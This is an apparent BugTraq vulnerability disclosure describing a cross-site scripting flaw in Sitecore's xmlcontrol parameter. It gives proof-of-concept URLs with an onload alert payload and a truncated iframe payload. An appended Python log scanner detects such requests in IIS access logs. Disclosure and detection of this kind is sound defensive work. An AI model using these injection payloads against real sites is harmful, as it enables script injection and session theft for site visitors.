BugTraq
SiteCore XML Control Script Insertion Jan 29 2014 07:10AM
Mark Litchfield (mark securatary com)
Hey All,

Sitecore's "special way" of displaying XML Controls directly allows for a
Cross Site Scripting Attack - more can be achieved with these XML
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%...
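
A defender-side check for the pattern in the post, added here as an example and not part of the original message or Sitecore's code: it scans IIS-style W3C access logs for `xmlcontrol` values that are not plain control names. The log layout, the sample rows, the name `Sample.Control` and the rule for what a legitimate value looks like are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate xmlcontrol values are plain control names (letters,
# digits, dots, underscores). Replace with an explicit allowlist if you have one.
CONTROL_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*")

def suspicious_xmlcontrol(query):
    """Return decoded xmlcontrol values in a raw query string that are not plain names."""
    hits = []
    # parse_qsl splits each pair on the first '=' only and percent-decodes the
    # value, so 'body%20onload=alert(123)' arrives as 'body onload=alert(123)'.
    for key, value in parse_qsl(query, keep_blank_values=True):
        # The key is compared case-insensitively (assumed to match the server).
        if key.lower() == "xmlcontrol" and not CONTROL_NAME.fullmatch(value):
            hits.append(value)
    return hits

def scan_w3c_log(lines):
    """Return (client_ip, uri_stem, value) for flagged requests in W3C extended log lines."""
    fields, findings = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if query == "-":                   # W3C logs write '-' for an empty field
            continue
        for value in suspicious_xmlcontrol(query):
            findings.append((row.get("c-ip", "-"), row.get("cs-uri-stem", "-"), value))
    return findings

# Constructed sample log (not real traffic); the second request is the URL from the post.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2014-01-29 07:10:01 192.0.2.10 GET / xmlcontrol=Sample.Control 200
2014-01-29 07:10:05 192.0.2.77 GET / xmlcontrol=body%20onload=alert(123) 200
2014-01-29 07:10:09 192.0.2.10 GET /default.aspx - 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, value in scan_w3c_log(SAMPLE_LOG):
        print(f"{ip} {stem} xmlcontrol={value!r}")
```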
